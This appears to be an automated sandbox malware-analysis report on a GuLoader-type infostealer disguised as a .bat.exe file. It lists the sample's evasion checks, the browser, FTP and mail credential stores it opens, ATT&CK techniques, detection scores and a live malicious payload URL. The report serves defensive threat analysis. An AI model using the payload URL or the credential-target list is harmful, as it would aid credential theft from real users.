          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
          Source: C:\Users\user\Desktop\004552024107.bat.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
          Source: C:\Users\user\Desktop\004552024107.bat.exeAPI/Special instruction interceptor: Address: 5EEC203
          Source: C:\Users\user\Desktop\004552024107.bat.exeAPI/Special instruction interceptor: Address: 2F5C203
          Source: C:\Users\user\Desktop\004552024107.bat.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeMemory allocated: 34410000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeMemory allocated: 34260000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsj7426.tmp\UserInfo.dllJump to dropped file
          Source: C:\Users\user\Desktop\004552024107.bat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsj7426.tmp\nsExec.dllJump to dropped file
          Source: C:\Users\user\Desktop\004552024107.bat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsj7426.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\004552024107.bat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsj7426.tmp\BgImage.dllJump to dropped file
          Source: C:\Users\user\Desktop\004552024107.bat.exeAPI coverage: 2.1 %
          Source: C:\Users\user\Desktop\004552024107.bat.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
          Source: C:\Users\user\Desktop\004552024107.bat.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 0_2_00405A4F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405A4F
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 0_2_00406620 FindFirstFileA,FindClose,0_2_00406620
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 0_2_004027CF FindFirstFileA,0_2_004027CF
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 2_2_00405A4F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,2_2_00405A4F
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 2_2_00406620 FindFirstFileA,FindClose,2_2_00406620
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 2_2_004027CF FindFirstFileA,2_2_004027CF
          Source: 004552024107.bat.exe, 00000002.00000002.6151836624.0000000003D15000.00000004.00000020.00020000.00000000.sdmp, 004552024107.bat.exe, 00000002.00000002.6151836624.0000000003CA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: C:\Users\user\Desktop\004552024107.bat.exeAPI call chain: ExitProcess graph end nodegraph_0-4534
          Source: C:\Users\user\Desktop\004552024107.bat.exeAPI call chain: ExitProcess graph end nodegraph_0-4681
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 0_2_6D0E1B28 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_6D0E1B28
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeMemory allocated: page read and write | page guardJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeProcess created: C:\Users\user\Desktop\004552024107.bat.exe "C:\Users\user\Desktop\004552024107.bat.exe"Jump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeQueries volume information: C:\Users\user\Desktop\004552024107.bat.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeCode function: 0_2_004033D8 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033D8
          Source: C:\Users\user\Desktop\004552024107.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Source: C:\Users\user\Desktop\004552024107.bat.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
          Source: C:\Users\user\Desktop\004552024107.bat.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
          Source: Yara matchFile source: 00000002.00000002.6168473251.0000000034445000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: 004552024107.bat.exe PID: 9904, type: MEMORYSTR
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
          Windows Management Instrumentation
          1
          DLL Side-Loading
          1
          DLL Side-Loading
          1
          Disable or Modify Tools
          2
          OS Credential Dumping
          3
          File and Directory Discovery
          Remote Services1
          Archive Collected Data
          1
          Ingress Tool Transfer
          Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts1
          Native API
          1
          Registry Run Keys / Startup Folder
          1
          Access Token Manipulation
          1
          Deobfuscate/Decode Files or Information
          1
          Credentials in Registry
          126
          System Information Discovery
          Remote Desktop Protocol2
          Data from Local System
          1
          Encrypted Channel
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)11
          Process Injection
          1
          Obfuscated Files or Information
          Security Account Manager311
          Security Software Discovery
          SMB/Windows Admin Shares1
          Email Collection
          2
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
          Registry Run Keys / Startup Folder
          1
          DLL Side-Loading
          NTDS12
          Virtualization/Sandbox Evasion
          Distributed Component Object Model1
          Clipboard Data
          12
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Masquerading
          LSA Secrets1
          System Network Configuration Discovery
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
          Virtualization/Sandbox Evasion
          Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          Access Token Manipulation
          DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
          Process Injection
          Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          004552024107.bat.exe18%VirustotalBrowse
          004552024107.bat.exe100%AviraHEUR/AGEN.1338492
          004552024107.bat.exe16%ReversingLabsWin32.Trojan.Generic
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nsj7426.tmp\BgImage.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\nsj7426.tmp\BgImage.dll0%VirustotalBrowse
          C:\Users\user\AppData\Local\Temp\nsj7426.tmp\System.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\nsj7426.tmp\System.dll1%VirustotalBrowse
          C:\Users\user\AppData\Local\Temp\nsj7426.tmp\UserInfo.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\nsj7426.tmp\UserInfo.dll0%VirustotalBrowse
          C:\Users\user\AppData\Local\Temp\nsj7426.tmp\nsExec.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\nsj7426.tmp\nsExec.dll0%VirustotalBrowse
          No Antivirus matches
          SourceDetectionScannerLabelLink
          ip-api.com0%VirustotalBrowse
          SourceDetectionScannerLabelLink
          http://185.222.58.113/ubsFsaZf137.bin100%Avira URL Cloudmalware
          http://nsis.sf.net/NSIS_ErrorError0%Avira URL Cloudsafe
          http://nsis.sf.net/NSIS_Error0%Avira URL Cloudsafe
          http://185.222.58.113/ubsFsaZf137.binQ0%Avira URL Cloudsafe
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%Avira URL Cloudsafe
          http://nsis.sf.net/NSIS_Error0%VirustotalBrowse
          http://nsis.sf.net/NSIS_ErrorError0%VirustotalBrowse
          http://www.skinstudio.netG0%Avira URL Cloudsafe
          http://ip-api.com/line/?fields=hosting0%Avira URL Cloudsafe
          http://ip-api.com0%Avira URL Cloudsafe
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%VirustotalBrowse
          http://ip-api.com0%VirustotalBrowse
          http://ip-api.com/line/?fields=hosting0%VirustotalBrowse
          NameIPActiveMaliciousAntivirus DetectionReputation
          ip-api.com
          208.95.112.1
          truetrueunknown
          NameMaliciousAntivirus DetectionReputation
          http://185.222.58.113/ubsFsaZf137.binfalse
          • Avira URL Cloud: malware
          unknown
          http://ip-api.com/line/?fields=hostingfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          http://185.222.58.113/ubsFsaZf137.binQ004552024107.bat.exe, 00000002.00000002.6151836624.0000000003CA8000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://nsis.sf.net/NSIS_Error004552024107.bat.exefalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://nsis.sf.net/NSIS_ErrorError004552024107.bat.exefalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name004552024107.bat.exe, 00000002.00000002.6168473251.0000000034411000.00000004.00000800.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://www.skinstudio.netG004552024107.bat.exefalse
          • Avira URL Cloud: safe
          unknown
          http://ip-api.com004552024107.bat.exe, 00000002.00000002.6168473251.0000000034411000.00000004.00000800.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          208.95.112.1
          ip-api.comUnited States
          53334TUT-ASUStrue
          185.222.58.113
          unknownNetherlands
          51447ROOTLAYERNETNLfalse
          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1465163
          Start date and time:2024-07-01 12:24:19 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 15m 49s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2021, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
          Run name:Suspected Instruction Hammering
          Number of analysed new started processes analysed:20
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:004552024107.bat.exe
          Detection:MAL
          Classification:mal100.troj.spyw.evad.winEXE@3/17@1/2
          EGA Information:
          • Successful, ratio: 100%
          HCA Information:
          • Successful, ratio: 90%
          • Number of executed functions: 130
          • Number of non-executed functions: 63
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, VSSVC.exe, svchost.exe
          • Excluded domains from analysis (whitelisted): fs.microsoft.com, login.live.com, settings-win.data.microsoft.com, ctldl.windowsupdate.com, arc.msn.com, nexusrules.officeapps.live.com
          • Not all processes where analyzed, report is missing behavior information
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Report size getting too big, too many NtReadVirtualMemory calls found.
          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
          No simulations
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          208.95.112.1New Order CHAL-0435.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
          • ip-api.com/line/?fields=hosting
          004552024107.bat.exeGet hashmaliciousGuLoaderBrowse
          • ip-api.com/line/?fields=hosting
          DHL AWB COMMERCAIL INVOICE AND TRACKING DETAILS.exeGet hashmaliciousAgentTeslaBrowse
          • ip-api.com/line/?fields=hosting
          lOLcENr3Kl.exeGet hashmaliciousBlackshades, DarkTortilla, QuasarBrowse
          • ip-api.com/json/
          Purchase List VIXEN International 90349033 PDF.exeGet hashmaliciousAgentTeslaBrowse
          • ip-api.com/line/?fields=hosting
          Vsl_MV DART TRADER_001.exeGet hashmaliciousAgentTeslaBrowse
          • ip-api.com/line/?fields=hosting
          DHL Arrival Notice.exeGet hashmaliciousAgentTeslaBrowse
          • ip-api.com/line/?fields=hosting
          a.exeGet hashmaliciousUnknownBrowse
          • ip-api.com/line/?fields=hosting
          a.exeGet hashmaliciousUnknownBrowse
          • ip-api.com/line/?fields=hosting
          Example.exeGet hashmaliciousUnknownBrowse
          • ip-api.com/line/?fields=hosting
          185.222.58.113004552024107.bat.exeGet hashmaliciousGuLoaderBrowse
          • 185.222.58.113/bJibCYgZszSl185.bin
          Documents.com.exeGet hashmaliciousGuLoaderBrowse
          • 185.222.58.113/QZxiWpS132.bin
          27062024-322copy.exeGet hashmaliciousGuLoaderBrowse
          • 185.222.58.113/dzPxpaYSrjQF221.bin
          Jailkeeper.bat.exeGet hashmaliciousGuLoaderBrowse
          • 185.222.58.113/aZZfDlS144.bin
          e6FEkdlKCX.exeGet hashmaliciousRedLineBrowse
          • 185.222.58.113:55615/
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          ip-api.comNew Order CHAL-0435.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
          • 208.95.112.1
          004552024107.bat.exeGet hashmaliciousGuLoaderBrowse
          • 208.95.112.1
          DHL AWB COMMERCAIL INVOICE AND TRACKING DETAILS.exeGet hashmaliciousAgentTeslaBrowse
          • 208.95.112.1
          lOLcENr3Kl.exeGet hashmaliciousBlackshades, DarkTortilla, QuasarBrowse
          • 208.95.112.1
          Purchase List VIXEN International 90349033 PDF.exeGet hashmaliciousAgentTeslaBrowse
          • 208.95.112.1
          Vsl_MV DART TRADER_001.exeGet hashmaliciousAgentTeslaBrowse
          • 208.95.112.1
          DHL Arrival Notice.exeGet hashmaliciousAgentTeslaBrowse
          • 208.95.112.1
          a.exeGet hashmaliciousUnknownBrowse
          • 208.95.112.1
          a.exeGet hashmaliciousUnknownBrowse
          • 208.95.112.1
          Example.exeGet hashmaliciousUnknownBrowse
          • 208.95.112.1
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          ROOTLAYERNETNL004552024107.bat.exeGet hashmaliciousGuLoaderBrowse
          • 185.222.58.113
          Documents.com.exeGet hashmaliciousGuLoaderBrowse
          • 185.222.58.113
          27062024-322copy.exeGet hashmaliciousGuLoaderBrowse
          • 185.222.58.113
          Jailkeeper.bat.exeGet hashmaliciousGuLoaderBrowse
          • 185.222.58.113
          v1JxTE3aw1.exeGet hashmaliciousRedLineBrowse
          • 185.222.58.234
          GLslDiEqwx.exeGet hashmaliciousRedLineBrowse
          • 185.222.58.79
          oIZhm8seZB.exeGet hashmaliciousRedLineBrowse
          • 185.222.58.70
          FbfKnwuoXd.exeGet hashmaliciousRedLineBrowse
          • 185.222.58.70
          7f40bfb86707faf0ec8978614840ab858320d1978bc351546833272b7b70c854_payload.exeGet hashmaliciousRedLineBrowse
          • 185.222.58.77
          Q4293pswBW.exeGet hashmaliciousRedLineBrowse
          • 185.222.58.77
          TUT-ASUSNew Order CHAL-0435.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
          • 208.95.112.1
          004552024107.bat.exeGet hashmaliciousGuLoaderBrowse
          • 208.95.112.1
          DHL AWB COMMERCAIL INVOICE AND TRACKING DETAILS.exeGet hashmaliciousAgentTeslaBrowse
          • 208.95.112.1
          lOLcENr3Kl.exeGet hashmaliciousBlackshades, DarkTortilla, QuasarBrowse
          • 208.95.112.1
          Purchase List VIXEN International 90349033 PDF.exeGet hashmaliciousAgentTeslaBrowse
          • 208.95.112.1
          Vsl_MV DART TRADER_001.exeGet hashmaliciousAgentTeslaBrowse
          • 208.95.112.1
          DHL Arrival Notice.exeGet hashmaliciousAgentTeslaBrowse
          • 208.95.112.1
          a.exeGet hashmaliciousUnknownBrowse
          • 208.95.112.1
          a.exeGet hashmaliciousUnknownBrowse
          • 208.95.112.1
          Example.exeGet hashmaliciousUnknownBrowse
          • 208.95.112.1
          No context
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          C:\Users\user\AppData\Local\Temp\nsj7426.tmp\BgImage.dllOrder 00293884800595.bat.exeGet hashmaliciousGuLoaderBrowse
            004552024107.bat.exeGet hashmaliciousGuLoaderBrowse
              DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeGet hashmaliciousGuLoaderBrowse
                Order 00293884800595.bat.exeGet hashmaliciousGuLoaderBrowse
                  004552024107.bat.exeGet hashmaliciousGuLoaderBrowse
                    P0-ADFUK.bat.exeGet hashmaliciousGuLoaderBrowse
                      P0-ADFUK.bat.exeGet hashmaliciousGuLoaderBrowse
                        C:\Users\user\AppData\Local\Temp\nsj7426.tmp\System.dllOrder 00293884800595.bat.exeGet hashmaliciousGuLoaderBrowse
                          004552024107.bat.exeGet hashmaliciousGuLoaderBrowse
                            DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeGet hashmaliciousGuLoaderBrowse
                              Order 00293884800595.bat.exeGet hashmaliciousGuLoaderBrowse
                                004552024107.bat.exeGet hashmaliciousGuLoaderBrowse
                                  P0-ADFUK.bat.exeGet hashmaliciousGuLoaderBrowse
                                    P0-ADFUK.bat.exeGet hashmaliciousGuLoaderBrowse
                                      pp0fHVNbib.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                        pp0fHVNbib.exeGet hashmaliciousGuLoaderBrowse
                                          Process:C:\Users\user\Desktop\004552024107.bat.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):49
                                          Entropy (8bit):4.75216571132969
                                          Encrypted:false
                                          SSDEEP:3:a6QLQIfLBJXlFGfv:xQkIPeH
                                          MD5:797DA95245047A54F125FBF3B19FA295
                                          SHA1:9E46F51C033836343C4099609F35B9B62C290A00
                                          SHA-256:A047914D1DB23829E36D3A2A908D83F4B51F5A8194AE090BB9F9AB9F8DDA9128
                                          SHA-512:4755C72A469C7C816D7B4A08BFEABFC266AAD029156A301E2592E3AFD16C5DB5FCE44C4475CB83C43B859A06AD069370182FCA5CAFACF4A27D191F4C0AE34A03
                                          Malicious:false
                                          Reputation:moderate, very likely benign file
                                          Preview:[Loading]..Start=user32::EnumWindows(i r2 ,i 0)..
                                          Process:C:\Users\user\Desktop\004552024107.bat.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):7680
                                          Entropy (8bit):5.188410641489526
                                          Encrypted:false
                                          SSDEEP:96:8eQMA6z4f7TI20Y1wircawlkX1b3+LDfbAJ8uLzqkLnLiEQjJ3KxkP:tChfHv08wocw3+e8uLmyLpmP
                                          MD5:2D5F40DDC34E9DC8F43B5BF1F61301E3
                                          SHA1:5ED3CD47AFFC4D55750E738581FCE2B40158C825
